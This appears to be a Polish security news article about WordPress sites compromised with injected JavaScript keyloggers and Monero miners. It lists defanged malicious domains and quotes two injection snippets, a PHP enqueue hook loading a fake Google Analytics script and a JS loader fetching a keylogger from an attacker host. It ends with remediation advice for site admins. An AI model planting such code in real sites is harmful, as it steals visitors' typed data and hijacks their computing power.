Tysiące stron WordPress pobiera keyloggery JavaScript i kopie Monero

Na razie mowa nawet o kilkuset stronach internetowych napędzanych WordPressem, które infekowane były złośliwym skryptem i ładowały z zewnętrznej domeny niebezpieczny JavaScript, który z kolei rejestrował wpisywane przez użytkownika dane w pola tekstowe na stronach internetowych. O kilkuset zainfekowanych witrynach wspominają eksperci z Sucuri. Niestety ów wektor dystrybucji złośliwego kodu był już zauważony w kwietniu 2017. Od tego czasu z kilkoma zmianami w domenach TLD (z nich zainfekowana strona ładowała kod JavaScript) i różnymi metodami zaciemniania kodu zdołano zainfekować kilka tysięcy instancji WordPressów, które kopały krypto-walutę Monero oraz służyły za „przeglądarkowego” keyloggera.

Domeny z których pobierano złośliwe biblioteki JavaScript:

hxxps://cdjs[.]online/lib.js
hxxps://cdjs[.]online/lib.js?ver=…
hxxps://cdns[.]ws/lib/googleanalytics.js?ver=…
hxxps://msdns[.]online/lib/mnngldr.js?ver=…
hxxps://msdns[.]online/lib/klldr.js //“keylogger loader”
hxxps://msdns[.]online/lib/kl.js //“keylogger loader”

Skrypty keyloggerów lub koparek Monero z domeny np. cdjs[.]online mogą być wstrzykiwane do bazy danych do tabeli „wp_posts” lub do pliku „functions.php”. Dzieje się tak na skutek dziurawej instancji WordPressa — luki we wtyczkach, samym rdzeniu WP, niewłaściwie zabezpieczonego serwera Apache, Nginx, czy też usługi SSH/FTP.

function chmnr_klgr_enqueue_script() {
wp_enqueue_script( 'chmnr_klgr-js', 'hxxps://cdns[.]ws/lib/googleanalytics.js', false );

wp

Domena „Cloudflare[.]solutions” została zablokowana przez dostawców wyszukiwarek (Google i Firefox, który korzysta z API Google do wykrywania złośliwych stron) i usunięta kilka dni po tym, jak badacze w grudniu 2017 roku opublikowali swoje odkrycie. Nie trzeba było długo czekać, aby przestępcy szybko zarejestrowali kilka nowych domen, które pobierały złośliwe biblioteki i które z kolei uruchamiały kod ładujący keyloggera lub koparkę Monero opracowaną przez firmę CoinHive, specjalizująca się w dostarczaniu takich usług internetowych:  

var snf = document.createElement("script");
snf.type = "text/javascript";
snf.setAttribute("defer", "defer");
snf.src = "hxxps://msdns[.]online/lib/kl.js";
document.head.appendChild(snf);

Administratorom blogów mniejszych i większych zalecamy, aby przyjrzeli się swoim stronom internetowym pod kątem złośliwych skryptów. Najlepiej zrobić to za pomocą wbudowanych w przeglądarki narzędzi deweloperskich lub posłużyć się poradnikiem rekomendowanym przez Sucuri lub przez polską firmę Webanti, która dostarcza gotowe narzędzia do ochrony w czasie rzeczywistym / skanowania stron internetowych.

Do infekcji dochodzi na skutek luk w oprogramowaniu, dlatego warto już teraz przeprowadzić aktualizację rdzenia, modułów, przejrzeć plik „functions.php” oraz pozmieniać wszystkie dostępowe hasła do panelu administratora, a także usług na serwerze.



Zapoznaj się z naszą ofertą

Jeśli zajmujesz się sprzedażą rozwiązań zabezpieczających, jesteś dystrybutorem, autoryzowanym partnerem lub producentem i chciałbyś na portalu AVLab zaprezentować swoje portfolio gronu potencjalnych odbiorców, zareklamować wydarzenie, oprogramowanie, sprzęt lub inne usługi — po prostu napisz do nas. A może mialeś/aś do czynienia z ransomware? Pomagamy też w odszyfrowaniu plików.
Czytaj więcej